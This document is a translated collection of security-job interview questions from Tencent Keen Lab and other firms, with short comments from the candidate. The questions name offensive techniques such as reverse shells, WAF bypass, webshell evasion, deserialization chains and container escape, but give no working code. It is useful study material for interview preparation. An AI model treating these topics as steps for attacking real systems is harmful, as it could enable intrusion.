1. Tell me about your own experience first?
2. You are only a sophomore and should be a junior. How did you teach yourself safety in school?
3. How did you get in touch with security?
4. What are you studying now?
5. What is your recent study plan?
6. How do you allocate your usual courses and safe learning in college? Will it conflict?

0x17 Tencent-Keen Lab Internship

one side

Duration: One and a half hours

1. tcp three-way handshake
2. Introduce a penetration testing process
   1. Talked about a code audit
3. SSRF vulnerability
4. The general process of intranet penetration
5. Introduce another difficult penetration test
6. What intrusion detection methods does the defender have, and what traces can be caught?
7. Introducing Processes and Threads
8. The relationship between process and thread memory space
9. Introduction to the parent-child process
10. Orphan and Zombie Processes
    1. I'm talking about it the other way around
11. When killing a process, those things happened, from the perspective of the parent-child process
12. Several ways to rebound the shell
    1. The essence is to use the tcp protocol to transmit the bash program
13. The category of att&ck matrix, introducing the CC in it
14. Go to the domain name to get the result of the command execution
    1. I didn’t hear this part clearly. During the interview, I directly said that I don’t know. I still didn’t hear clearly when I listened to the recording after replaying, but it seems that what I want to ask is the DNS domain name resolution acquisition command execution echo.
15. Linux command wildcards
16. I spent about ten minutes asking questions about network protection traceability and threat analysis.
    1. Not at all, I will never write Huwang on my resume in the future
17. What methods does the defender have in the xx offensive and defensive drill? The questions are quite complicated, mainly about intrusion trace detection and source tracing.
    1. This part is not very good
18. Introduction to SVM and KNN
19. Introduction to Convolutional Neural Networks
20. Levenstein distance
21. search engine algorithm
    1. I don’t know much, I probably talked about the dictionary tree
22. Inverted index
23. Malicious samples give the md5 of the function family, how to classify
    1. From the perspective of statistical law
24. rhetorical question

two sides

Duration: half an hour

1. The first question was directly asked about the protection net, which was almost the same as the question asked on the first side, and it was directly cracked
2. Linux boot self-starting method
3. init.d script introduction
4. How to check which files are called by the program in Linux
5. How to Monitor Linux File Operations
   1. I was already very flustered when I asked here. I don’t know how to operate Linux very well, and the interviewer kept sighing that I am so old.
6. What system calls does Linux have
   1. Won't
7. GDB debugging
   1. Won't
8. View Linux open network ports, multi-thread status
9. The way to rebound the shell
10. How to hide files under Linux
11. Subdomain Collection
12. DNS rebinding
13. DNS resolution process
14. CC traffic
    1. never heard
15. ssh tunnel
    1. I didn’t hear clearly during the interview. When I heard the tunnel, I thought it was UDP going through the tunnel.
16. Introduction to https certificate mechanism
17. Some usage methods of burpsuite, plug-in development methods
18. The basic operation of nmap
19. syn open link principle
20. redis exploit
21. Runc container escape principle
22. Common WAF types (I don’t know why I asked about Changting’s WAF)
23. MySQL的UAF
    1. Have not heard
24. Algorithm questions (relatively simple, leetcode easy level)
25. Linux process communication
26. rhetorical question

0x18 Interview review of a four-character factory

one side

1. See you do more java, talk about the principle and utilization of java memory horse
2. Then you talk about how to check and kill java memory horses, tools and principles
3. Do you understand Ice Scorpion and Godzilla? Tell me about the principle
4. What did you do as an intern at other companies before?
5. Do you have actual combat experience around waf, and talk about it from the perspective of various loopholes
6. Are you familiar with webshell avoidance? Let’s talk about the principle
7. Have you done other avoidance, such as combining cs and msfvenom
8. Let’s talk about the principle of fastjson deserialization and common utilization chains
9. Are you familiar with the data structure, talk about the principle of red-black tree
10. Java's hashmap uses red-black tree, let's talk about the principle of hashmap
11. Do you have experience in traffic analysis?
12. Talk about code audit experience
13. Seeing that you have some cnvd and cve, talk about the process of digging holes
14. Have you ever played a well-known ctf? Tell me about your experience
15. Familiar with intranet penetration, domain control, etc., talk about actual combat experience
16. Let’s talk about the cc chain principle of java deserialization
17. See you have rewritten sqlmap, have you read the source code of sqlmap?
18. Seeing that you are familiar with mysql, talk about indexes, storage structures, etc.
19. Tell me why mysql uses b+ tree
20. Have you seen the mysql source code?
21. Have you analyzed binary vulnerabilities?
22. Have you ever written anything in assembly
23. Talk about the loopholes in the linux kernel
24. Have you ever dug a buffer overflow vulnerability?
25. Do you understand python's sandbox escape?
26. Python's flask template injection talk
27. Seeing that you have done projects related to abstract syntax trees, talk about it
28. Talk about the concept and principle of rasp
29. Talk about the confrontation of rasp
30. Talk about the security issues of php and golang language itself
31. Do you know about machine learning and algorithms?
32. Seeing that you have tried to write a simple operating system, talk about your ideas
33. do you have anything to ask me

two sides

1. Tell me about the most memorable hole you've ever dug
2. Tell me about the security tools you have written, from the point of view and principle
3. Talk about how to bypass WAF when uploading files
4. The use of SSRF and the means of circumventing WAF
5. Talk about how to use MSSQL if XPCMDSHELL cannot be used
6. What should I do if I encounter an RCE that does not echo?
7. OS-SHELL without SQLMAP, how to write SHELL for various databases
8. Give you a relatively large log, how should it be analyzed
9. Talk about what problems can be caused by redis unauthorized
10. Talk about SYN FLOOD principle, defense and detection methods
11. Talk about the principle, defense and detection methods of UDP reflection amplification
12. Tell me about your advantages
13. do you have anything to ask me

Three sides

1. Padding Oracle Attack讲讲
2. The principle of Fastjson deserialization and the principle of 1.2.47 bypass
3. What are the functions that cause deserialization other than readObject?
4. Talk about the chains you are most familiar with in the CC chain
5. The principle of Shiro550 deserialization and the idea of ​​using tools to write
6. The most impressive talk about the analysis process in the RCE of Spring/Struts2
7. sql injection way around WAF say as much as possible
8. The principle of block transmission around WAF
9. What are the ways to upload files around WAF
10. Tell me about the most impressive of these CVEs you have dug
11. what are your greatest strengths and weaknesses
12. Which field of security do you want to do in the future?
13. How is your school grade? Did you fail any subjects?
14. do you have anything to ask me

0x19 Internship interview review of a four-character factory

one side

1. Self introduction
2. Advantages and reasons for arrays and linked lists
3. Explain the difference between process and thread at the operating system level
4. Thread and process communication methods and data security issues
5. Scenarios and reasons for the selection of multi-process and multi-thread
6. Know which WAF talk about the principle
7. Say as much as possible about SQL injection around WAF
8. What is the payload length of FUZZ around WAF?
9. What regular rules have you written to talk about specific scenarios?
10. You can't test the regularity of writing ipv4 directly without checking the data
11. The deserialization principle of Fastjson
12. What kind of security problems will the Java reflection mechanism cause?
13. The similarities between XSS and CSRF and how to use them together
14. The location and principle of CSRF_TOKEN and bypass
15. Say as many HTTP headers as you know
16. The principle of Nmap's common scanning methods and the principle of NSE scripts
17. Seeing that you have a lot of CNVD certificates, let me tell you about the process of digging holes
18. Tell me about what you have learned from the certifications you have taken.
19. Seeing that you have many projects on Github
20. Do you think you have any bright spots?
21. what do you want to ask me

two sides

1. Self introduction
2. Familiar with which Web vulnerabilities to talk about
3. Principles of cross-domain solutions and security issues
4. How to choose Python multi-process and multi-thread
5. What does Python's GIL lock essentially do
6. Why does Java's JVM have GCROOT
7. What garbage collectors does Java's JVM have?
8. What are the disadvantages of the garbage collection counting reference mechanism
9. How does CSRF get Cookie
10. How to tell if a website is a phishing website
11. How do different domain names get cookies through CSRF
12. Talk about some common HTTP headers and their functions
13. What HTTP-Only does essentially
14. Talk about balanced binary tree and binary search tree
15. SYN Flood attack principle and solution
16. What is the principle of SYN reverse detection
17. Principle of TCP SYN Cookie
18. ARP spoofing attack principle and solution
19. What is an efficient way of UDP port probing
20. What is Nmap's FIN scan and empty scan
21. Let me talk about the change of the serial number of the three-way handshake
22. What are the value types and reference types of Python
23. Are Python's list and dict thread-safe?
24. Tell me about the most rewarding project you have done
25. what do you want to ask me

Three sides

1. Self introduction
2. Explain CSRF
3. Talk about SSRF with practical examples
4. Talk about RCE with practical examples
5. Why are there so few file uploads now?
6. Do you understand WAF based on semantic analysis?
7. Tell me about what you did in your last internship
8. Talk about a few impressive digging experiences
9. Tell me about your plans for the future
10. Do you have the will to rectify
11. what do you want to ask me

Four sides (HR)

1. How was the interview experience?
2. talk about life ideal
3. Earliest time of practice

0x1A A two-character factory interview review

one side

1. Self introduction
2. What did you do in the first two internships?
3. Mathematical problems of medium difficulty
4. java class file structure
5. Do you understand the principle of Kafka?
6. Fastjson deserialization principle
7. Tell me about your most in-depth research field

two sides

1. How to prevent precompilation from being used for sorting
2. From the two perspectives of white box and black box, we will talk about the loopholes that have been dug
3. SSRF bypass and defense
4. Talk about the principles of code audit tools such as fortity
5. Talk about the principle of precompilation from the perspective of stored procedures
6. How does csp defend against xss
7. Why csrf can be defended with token
8. Give you a project to talk about the audit ideas
9. Intranet related issues
10. Tell me about the logical loopholes you dug
11. Tell me something you have written in golang
12. what is security

Three sides

1. Tell me about your own ideas for writing ysoserial
2. How to further exploit after determining the sql injection vulnerability
3. Lecture on the Vulnerability Principle of Pan Micro OA
4. The newly released Confluence RCE talk
5. What did you do in previous internships?
6. ***Principle and bypass in actual combat
7. Talk about the process of red-blue confrontation

four sides

1. Java deserialization principles and tools
2. Talk about the way of fingerprint recognition
3. The principle of shiro deserialization tool
4. How to find the sql injection point without using sqlmap
5. Tell me about the cves you dug up
6. Do you know anything about binary?

0x1B A security company - security researcher

one side

1. Tell me about the principles of several Burp plug-ins you wrote
2. Have you done any JavaWeb projects?
3. CC1-7 Find a familiar person to talk about the principle
4. Talk about the principle of Fastjson and Jackson deserialization
5. Can BCEL use other class loaders
6. XStream deserialization talk
7. What is the most basic deserialization principle
8. Do you understand the principle of JEP290?
9. Talk about the principle of RMI and related vulnerabilities
10. How JdbcRowSetImpl triggers JNDI injection
11. The difference between the four Transformers of the CC chain
12. Tell me about the CVE and CNVD you have dug
13. What are the trigger points for deserialization besides readObject?
14. Talk about Spring-related RCE principles
15. Talk about the principle of IIOP and T3 deserialization
16. Deserialization of PHP and other languages

two sides

1. safe for several years
2. what do you want to do in the future
3. Tell me about what you did during your internship
4. workplace requirements

at last

I have organized all these interview questions into PDF documents. If you need them, follow me and send them automatically.